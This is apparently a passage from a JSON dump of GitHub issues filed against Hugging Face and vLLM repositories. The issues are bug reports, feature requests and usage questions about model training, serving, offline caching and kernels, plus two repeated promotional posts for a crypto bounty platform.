a fact that the input of nested_detach could be complexly nested, like ([],())\n\nSo this function doesn't guarantee the logits is a torch.Tensor.\n\nNor does the implementation of prediction_step before nested_detach was called in prediction_step\n\n\"Image\"\n\nSo, the logits is not always a torch.Tensor, which is contradictory to what the type hint says, what did developers do?\n\nThey developed preprocess_logits_for_metrics.\nSo that user could fix it ON THEIR OWN IMPLEMENTATION.\n\n(preprocess_logits_for_metrics is called within evaluation_loop to clean the mess, specifically, logits, returned by prediction_step())\n\"Image\"\n\nIt's such a lazy fix. Why a regular user is expected to implement their own preprocess_logits_f\nor_metrics, to deal with a poorly-designed prediction_step?\n\nIt has been 5 years since the person who reported it.........\n\nIf a user-defined compute_metrics is not provided to Trainer or SFTTrainer, the prediction_step would return (loss, none, none), which skips the whole problem and this is why users said the issue of \"slow evaluation\" is gone when they don't provide compute_metrics.\n\nI would like to make a Pull Request to fix it but i don't have enough time and energy to do this massive amount of work.\n\nA temporary fix is to let users know when they need to make their own compute_metrics, they also have to implement preprocess_logits_for_metrics. Different models would have different styles of implementations but for text2text decoder only LLM.\n\n\"Image\"\n\n(Another thing is that the variable called ", "url": "https://github.com/huggingface/transformers/issues/42200", "state": "open", "labels": [ "Good Second Issue", "bug" ], "created_at": "2025-11-14T00:13:40Z", "updated_at": "2025-12-18T14:29:32Z", "comments": 3, "user": "Yacklin" }, { "repo": "huggingface/transformers", "number": 42197, "title": "Attempt to access socket despite HF_HUB_OFFLINE = 1 if cache warmed outside current process", "body": "### System Info\n\n- `transformers` version: 4.57.1\n- Platform: Linux-6.6.84.1-microsoft-standard-WSL2-x86_64-with-glibc2.35\n- Python version: 3.13.0\n- Huggingface_hub version: 0.36.0\n- Safetensors version: 0.6.2\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.9.1+cpu (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@ydshieh I have created a reproducible example of the issue I mentioned in https://github.com/huggingface/transformers/issues/41311#issuecomment-3508674325.\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nReproducible example: https://github.com/fr1ll/HF_HUB_OFFLINE\n\n\nWarming the cache in a subprocess, then disabling sockets, then loading the same model should work.\nHowever, it fails with an attempt to access a socket and then \"Can't load\" errors.\n\nThe script named `subprocess-warm_then_offline-load.py` reproduces this error.\n\nInterestingly, warming the cache in process, then disabling sockets, then loading the same model works.\nThis is reproduced in `inprocess-warm_then_offline-load.py` in the repo above.\n\n### Expected behavior\n\nWhen a model has already been loaded into the cache (\"warm cache\"), if `HF_OFFLINE_MODE` = `\"1\"`, a Transformers pipeline should be able to load the model without accessing any network sockets.", "url": "https://github.com/huggingface/transformers/issues/42197", "state": "closed", "labels": [ "Good Second Issue", "bug" ], "created_at": "2025-11-13T21:38:29Z", "updated_at": "2025-11-24T09:33:54Z", "comments": 6, "user": "fr1ll" }, { "repo": "vllm-project/vllm", "number": 28646, "title": "[Feature][P2]: Implement CI Build Time and Size Guards", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n### Description\nOnce we optimize the Docker build, we need to prevent regressions. Create CI checks that fail if build time exceeds thresholds or if image size grows beyond acceptable limits. Also set up monitoring dashboards.\n\n### What You'll Do\n1. Create Python scripts to check image metrics:\n - `check-image-size.py` (extend existing wheel size checker)\n - `check-build-time.py`\n - `check-image-layers.py`\n2. Add these checks to CI pipeline after image build\n3. Set appropriate thresholds (configurable)\n4. Create Buildkite annotations for warnings\n5. Set up CloudWatch dashboard for metrics (optional)\n\n### Deliverables\n- [ ] Python scripts for checking metrics\n- [ ] Integration into test-template-ci.j2\n- [ ] Configurable thresholds via environment variables\n- [ ] Documentation on how to adjust thresholds\n- [ ] CloudWatch dashboard (optional)\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28646", "state": "open", "labels": [ "feature request", "ci/build" ], "created_at": "2025-11-13T12:50:34Z", "updated_at": "2025-11-13T18:55:29Z", "comments": 0, "user": "rzabarazesh" }, { "repo": "huggingface/diffusers", "number": 12650, "title": "Question about the `# Copied from` system", "body": "Hi team! \ud83d\udc4b\n\nWhile working on improving docstrings and type hints across scheduler files (issue #9567), I've noticed the `# Copied from` pattern used extensively throughout the codebase.\n\nExamples:\n- Functions like `betas_for_alpha_bar` are duplicated across multiple schedulers\n- Output classes like `DDPMSchedulerOutput` are copied with name replacements (e.g., DDPM->EulerDiscrete)\n\nMy question: What's the rationale behind this duplication system instead of:\n1. Using a shared utils.py or common.py file for common functions\n2. Using class inheritance for similar Output classes\n\nI understand there might be good architectural reasons (module independence, API stability, avoiding circular dependencies, etc.), but this isn't documented anywhere that I could find.\n\nSuggested action: Regardless of the answer, I think we should either:\n- Option A: Refactor to use inheritance/shared utilities (if the current system is legacy)\n- Option B: Document this design decision in:\n  - A CONTRIBUTING.md or architecture doc\n  - Comments in the utils/check_copies.py script itself\n  - Another README in the diffusers directory\n\nThis would help future contributors (like me! \ud83d\ude05) understand why this pattern exists and how to work with it properly when improving documentation. What do you think?\n\nThanks for maintaining such a great library! \ud83d\ude80", "url": "https://github.com/huggingface/diffusers/issues/12650", "state": "open", "labels": [], "created_at": "2025-11-13T11:53:22Z", "updated_at": "2025-12-21T22:44:03Z", "comments": 3, "user": "delmalih" }, { "repo": "huggingface/transformers", "number": 42179, "title": "Add TileLang Kernel Support", "body": "### Feature request\n\nI would like to propose adding support for TileLang kernel in the transformers library. TileLang is a modular approach for writing attention kernels that could provide flexibility and performance benefits.\ngithub link: https://github.com/tile-ai/tilelang\n- Add TileLang as an optional attention backend\n- Provide configuration options similar to existing attention mechanisms\n- Ensure compatibility with existing model architectures\n- Add proper multi-GPU support and synchronization\n\n### Motivation\n\n- Enhanced Modularity\nTileLang offers a more modular approach to writing attention kernels, making it easier for researchers and developers to modify and optimize the implementation for specific use cases.\n\n- Performance Comparison\nIntegrating TileLang would allow users to benchmark its performance directly against existing attention implementations, such as Flex Attention and Flash Attention. This would foster a better understanding of how different kernels can impact model performance and efficiency.\n\n- Community Engagement\nSupporting TileLang in the Transformers library would attract a broader community of developers interested in optimizing transformer models, thus enhancing collaboration and innovation.\n\n- Flexibility\nTileLang's architecture is designed for ease of modification, allowing users to experiment with and refine attention mechanisms more effectively.\n\n### Your contribution\n\nI've experimented with TileLang kernel on transformers models and found it works well in single-GPU scenarios. However, when enabling multi-GPU inference using `device_map='auto'`, I encounter NaN tensors. This may be related to tensor synchronization issues in distributed settings.\n\nI'm willing to help with testing and potentially contributing to the implementation once the multi-GPU synchronization issue is understood and resolved.\n\nI also have 3 questions:\n1. Is there any existing plan or roadmap for TileLang integration?\n2. Are there specific guidelines for adding new attention backends?\n3. What would be the recommended approach for handling multi-GPU synchronization in custom kernels?\n", "url": "https://github.com/huggingface/transformers/issues/42179", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-11-13T11:38:33Z", "updated_at": "2025-11-13T11:38:33Z", "comments": 0, "user": "crownz248" }, { "repo": "huggingface/tokenizers", "number": 1885, "title": "Feature request: Characters delimiter argument", "body": "I wish to develop a k-mer-character-based BPE tokenizer using your beautiful Rust package, for genomic applications. Unfortunately, it doesn't seem to support defining a characters delimiter. As I see it, it is a pretty straightforward change, instead of iterating a word by character, first split it by the delimiter and then iterate. Also, when merges are computed, in the string representation the character delimiter should also be considered. In that way, a multi-character word splitting could have been made feasible. Right now I am using a modified Python version of the BPE tokenizer made by the genius [Yikai-Liao](https://github.com/Yikai-Liao/efficient_bpe/blob/main/ebpe_v2.py), however it would be nice to see that happening in Rust as well, and natively supported by huggingface. Unfortunately, I am still novice in working with Rust, otherwise I would make a pull request with the suggested changes. Is it something that can be worked out in the future? Or is there a way to do this with the current implementation? Thank you!", "url": "https://github.com/huggingface/tokenizers/issues/1885", "state": "open", "labels": [], "created_at": "2025-11-13T10:40:29Z", "updated_at": "2025-11-28T07:51:07Z", "comments": 1, "user": "VasLem" }, { "repo": "vllm-project/vllm", "number": 28629, "title": "[Usage]: TPOT per request information was not collected by vllm bench serve", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+xpu\nIs debug build : False\nCUDA used to build PyTorch : None\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.14.0-1006-intel-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : False\nCUDA runtime version : No CUDA\nCUDA_MODULE_LOADING set to : N/A\nGPU models and configuration : No CUDA\nNvidia driver version : No CUDA\ncuDNN version : No CUDA\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: Intel(R) Xeon(R) w5-3435X\nBIOS Model name: Intel(R) Xeon(R) w5-3435X CPU @ 3.1GHz\nBIOS CPU family: 179\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 16\nSocket(s): 1\nStepping: 8\nCPU(s) scaling MHz: 45%\nCPU max MHz: 4700.0000\nCPU min MHz: 800.0000\nBogoMIPS: 6192.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 768 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 32 MiB (16 instances)\nL3 cache: 45 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-31\nVulnerability Gather data sampling: Not affected\nVulnerability Ghostwrite: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and ", "url": "https://github.com/vllm-project/vllm/issues/28629", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-13T09:20:19Z", "updated_at": "2025-11-13T09:20:19Z", "comments": 0, "user": "jlwang1996" }, { "repo": "vllm-project/vllm", "number": 28626, "title": "[Bug]:Qwen3-VL-32B-AWQ model memory usage: 8k context limit with 40GB VRAM?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nRunning models on the latest stable vLLM release: https://huggingface.co/QuantTrio/Qwen3-VL-32B-Instruct-AWQ\nThe model size is 20GB, and my GPU has 40GB VRAM total.\nUsing parameter: --gpu-memory-utilization 0.9\nWhy am I only getting around 8k max context length? Do VL models really hog that much VRAM?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28626", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-13T08:00:20Z", "updated_at": "2025-11-17T07:08:47Z", "comments": 3, "user": "maxin9966" }, { "repo": "vllm-project/vllm", "number": 28622, "title": "[Bug]: Can we able to benchmark Quantized MOE models Either W8A8 or W8A16 ?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.18 (main, Jun 4 2025, 08:56:00) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.14.0-33-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.0.140\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA RTX 6000 Ada Generation\nNvidia driver version : 575.57.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.11.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 52\nOn-line CPU(s) list: 0-51\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) w7-2595X\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 26\nSocket(s): 1\nStepping: 8\nCPU(s) scaling MHz: 21%\nCPU max MHz: 4800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5616.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 1.2 MiB (26 instances)\nL1i cache: 832 KiB (26 instances)\nL2 cache: 52 MiB (26 instances)\nL3 cache: 48.8 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-51\nVulnerability Gather data sampling: Not affected\nVulnerability Ghostwrite: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not af", "url": "https://github.com/vllm-project/vllm/issues/28622", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-13T07:26:56Z", "updated_at": "2025-11-13T07:27:06Z", "comments": 0, "user": "logesh13" }, { "repo": "vllm-project/vllm", "number": 28610, "title": "[Usage]: Does 0.11.0 suport tree attenton with eagle?", "body": "### Your current environment\n\nDoes 0.11.0 suport tree attenton with eagle? Do I need to enable it manually?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28610", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-13T03:35:02Z", "updated_at": "2025-12-03T17:08:16Z", "comments": 1, "user": "wincle" }, { "repo": "huggingface/datasets", "number": 7864, "title": "add_column and add_item erroneously(?) require new_fingerprint parameter", "body": "### Describe the bug\n\nContradicting their documentation (which doesn't mention the parameter at all), both Dataset.add_column and Dataset.add_item require a new_fingerprint string. This parameter is passed directly to the dataset constructor, which has the fingerprint parameter listed as optional; is there any reason it shouldn't be optional in these methods as well? \n\n### Steps to reproduce the bug\n\nReproduction steps:\n\n1. Look at the function signature for add_column: https://github.com/huggingface/datasets/blob/17f40a318a1f8c7d33c2a4dd17934f81d14a7f57/src/datasets/arrow_dataset.py#L6078\n2. Repeat for add_item: https://github.com/huggingface/datasets/blob/17f40a318a1f8c7d33c2a4dd17934f81d14a7f57/src/datasets/arrow_dataset.py#L6336\n\n### Expected behavior\n\nadd_column and add_item should either set the fingerprint parameter to optional or include it in their docstrings\n\n### Environment info\n\nNot environment-dependent", "url": "https://github.com/huggingface/datasets/issues/7864", "state": "open", "labels": [], "created_at": "2025-11-13T02:56:49Z", "updated_at": "2025-12-07T14:41:40Z", "comments": 2, "user": "echthesia" }, { "repo": "vllm-project/vllm", "number": 28566, "title": "[Usage]: pd disagg scenario , I discover in the decoder , also has the prefill operation, is it normal ?", "body": "### Your current environment\n\nwhen num_computed_tokens is less than num_prompt_tokens, it will enter prefill operation\n\n\"Image\"\n\n\nand i found, num_computed_tokens is possible less than num_prompt_tokens, because num_prompt_tokens is len(block_ids) * self.block_size, event num_prompt_tokens is just equal to num_prompt_tokens, it do num_computed_tokens -= 1, why ? this cause num_computed_tokens is never equal to num_prompt_tokens\n\n\"Image\"\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28566", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-12T16:18:53Z", "updated_at": "2025-11-12T16:18:53Z", "comments": 0, "user": "yangshanjun" }, { "repo": "vllm-project/vllm", "number": 28564, "title": "[Usage]: Can't get ModernBert models to run in vllm serve", "body": "### Your current environment\n\nI am trying to download and use ModernBertModel with the vllm serve feature. \nAt first I thought it was an issue with the model so I switched from trying to use BertEmbed with Alibaba-NLP/gte-modernbert-base since it appears in the docs as a model that supports embedding. \nSource: https://docs.vllm.ai/en/latest/models/supported_models/#pooling-models \n\nI download and run it like this. \nDownload:\n`huggingface-cli download Alibaba-NLP/gte-modernbert-base --local-dir models/bert --local-dir-use-symlinks False`\nServe (example, I have used many iterations):\n`vllm serve models/bert2 --host 0.0.0.0 --port 8003 --task embed --trust-remote-code --gpu-memory-utilization 0.3`\n\nNo matter what I get this: Assertion failed, The model should be a generative or pooling model when task is set to 'embedding'. [type=assertion_error, input_value=ArgsKwargs((), {'model': ...rocessor_plugin': None}), input_type=ArgsKwargs]\n\nI tried setting runner but that didn't do a thing. I really have no clue why it says this model is supported in the docs. I have searched through other issues and documentation to try out a bunch of solutions but obviously none have worked so far. Been trying to figure this out for hours now and I am losing my mind (not relevant ig, need to vent).\n\n### How would you like to use vllm\n\nI want to run inference of a Alibaba-NLP/gte-modernbert-base or any ModernBertModel. I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28564", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-12T15:51:18Z", "updated_at": "2025-11-12T15:51:18Z", "comments": 0, "user": "Logikschleifen" }, { "repo": "vllm-project/vllm", "number": 28527, "title": "\ud83d\udca1 Bounty Platform for vLLM", "body": "Hi vLLM team! \ud83d\udc4b\n\nI wanted to share **Roxonn** - a decentralized bounty platform for accelerating AI/ML development.\n\n**What is Roxonn?**\n\u2705 Fund GitHub issues with crypto bounties (XDC, USDC, ROXN)\n\u2705 Notify 300+ AI/ML developers\n\u2705 Auto-pay when PRs merge via blockchain\n\u2705 Zero crypto setup needed\n\n**Quick flow:**\n1. Register repo (GitHub App)\n2. Fund pool with USDC (stable pricing)\n3. Assign bounties to features\n4. PR merged \u2192 automatic payment\n\n**Perfect for AI/ML:**\n- Access to research community\n- **Only 1% total platform fee**\n- Transparent payments\n\nLearn more: **https://roxonn.com**\n\n*No pressure - sharing a resource!*", "url": "https://github.com/vllm-project/vllm/issues/28527", "state": "closed", "labels": [], "created_at": "2025-11-12T07:50:33Z", "updated_at": "2025-11-13T12:36:15Z", "comments": 0, "user": "dineshroxonn" }, { "repo": "huggingface/transformers", "number": 42154, "title": "\ud83d\udca1 Bounty Platform for Hugging Face Transformers", "body": "Hi Hugging Face Transformers team! \ud83d\udc4b\n\nI wanted to share **Roxonn** - a decentralized bounty platform for accelerating AI/ML development.\n\n**What is Roxonn?**\n\u2705 Fund GitHub issues with crypto bounties (XDC, USDC, ROXN)\n\u2705 Notify 300+ AI/ML developers\n\u2705 Auto-pay when PRs merge via blockchain\n\u2705 Zero crypto setup needed\n\n**Quick flow:**\n1. Register repo (GitHub App)\n2. Fund pool with USDC (stable pricing)\n3. Assign bounties to features\n4. PR merged \u2192 automatic payment\n\n**Perfect for AI/ML:**\n- Access to research community\n- **Only 1% total platform fee**\n- Transparent payments\n\nLearn more: **https://roxonn.com**\n\n*No pressure - sharing a resource!*", "url": "https://github.com/huggingface/transformers/issues/42154", "state": "closed", "labels": [], "created_at": "2025-11-12T07:49:59Z", "updated_at": "2025-11-17T11:40:10Z", "comments": 2, "user": "dineshroxonn" }, { "repo": "vllm-project/vllm", "number": 28508, "title": "[Usage]: KVCacheManager Parameter question", "body": "\n\nI noticed that the parameter \u201cself.req_to_block_hashes\u201d has been removed from KVCacheManager since version v0.10.0. But this parameter is still preserved in the official documentation. Could you please provide an explanation of this change? \n\n- [Document Description](https://docs.vllm.ai/en/v0.9.2/api/vllm/v1/core/kv_cache_manager.html)\n\n- [Version v0.10.0 code](https://github.com/vllm-project/vllm/blob/v0.10.0/vllm/v1/core/kv_cache_manager.py)\n\n\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28508", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-12T03:10:18Z", "updated_at": "2025-11-16T08:33:45Z", "comments": 1, "user": "Liziqi-77" }, { "repo": "huggingface/diffusers", "number": 12638, "title": "How to design network with DiT blocks that are friendly to Tensorrt fp16 conversion?", "body": "We had a network that structed as `a convnet pre-encoder -> DiT blocks -> final block for last sampling`, it worked well with torch format and onnx format, but when we tried to convert it into tensorrt fp16 format, the inference will get value overflow. we had seen the data differene [between onnx and trt fp16, with polygraphy.] get larger and larger following those DiT blocks. My question is, how to make the whole model design more friendly to mix-precision inference? to let the DiT blocks less sensitive to value precision. Should I make the convnet pre-encoder and final blocks more complex, or more simple? Thanks", "url": "https://github.com/huggingface/diffusers/issues/12638", "state": "open", "labels": [], "created_at": "2025-11-12T02:23:37Z", "updated_at": "2025-11-12T02:23:37Z", "user": "JohnHerry" }, { "repo": "huggingface/lerobot", "number": 2428, "title": "how to eval the real world recorded dataset?", "body": "can lerobot eval the real world dataset with metric such as mse? I check the eval script and found that now it can only eval the sim env dataset", "url": "https://github.com/huggingface/lerobot/issues/2428", "state": "open", "labels": [ "question", "evaluation" ], "created_at": "2025-11-12T02:08:44Z", "updated_at": "2025-11-19T16:55:42Z", "user": "shs822" }, { "repo": "vllm-project/vllm", "number": 28505, "title": "[Feature]: Is there a plan to introduce the new feature nano-pearl, a new engineering effort in speculative reasoning.", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nNano-pearl can support speculative inference with higher concurrency (larger batch sizes) and is seamlessly compatible with algorithms like Eagle. Is there a plan to introduce it?\ngithub\uff1ahttps://github.com/smart-lty/nano-PEARL\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28505", "state": "open", "labels": [ "feature request" ], "created_at": "2025-11-12T01:34:22Z", "updated_at": "2025-11-17T06:14:09Z", "comments": 1, "user": "Lexlum" }, { "repo": "vllm-project/vllm", "number": 28498, "title": "[Bug][RL]: Port Conflict", "body": "### Your current environment\n\n- bug report:\n\n```\nHello vLLM team, I'm running into a suspicious ZMQ socket bug with my 2P 4D configuration for DeepSeek-V3 (see below). I thought it is caused by reusing same nodes for many vLLM launches, but now it happened also at a clean node. Seems like a DP bug of sorts. Please find logs attached. vllm==0.11.0.\n```\n\n```bash\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/async_llm.py\", line 134, in __init__\n[1;36m(APIServer pid=670293)[0;0m self.engine_core = EngineCoreClient.make_async_mp_client(\n[1;36m(APIServer pid=670293)[0;0m ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 101, in make_async_mp_client\n[1;36m(APIServer pid=670293)[0;0m return DPLBAsyncMPClient(*client_args)\n[1;36m(APIServer pid=670293)[0;0m ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 1125, in __init__\n[1;36m(APIServer pid=670293)[0;0m super().__init__(vllm_config, executor_class, log_stats,\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 975, in __init__\n[1;36m(APIServer pid=670293)[0;0m super().__init__(vllm_config, executor_class, log_stats,\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 769, in __init__\n[1;36m(APIServer pid=670293)[0;0m super().__init__(\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 466, in __init__\n[1;36m(APIServer pid=670293)[0;0m self.resources.output_socket = make_zmq_socket(\n[1;36m(APIServer 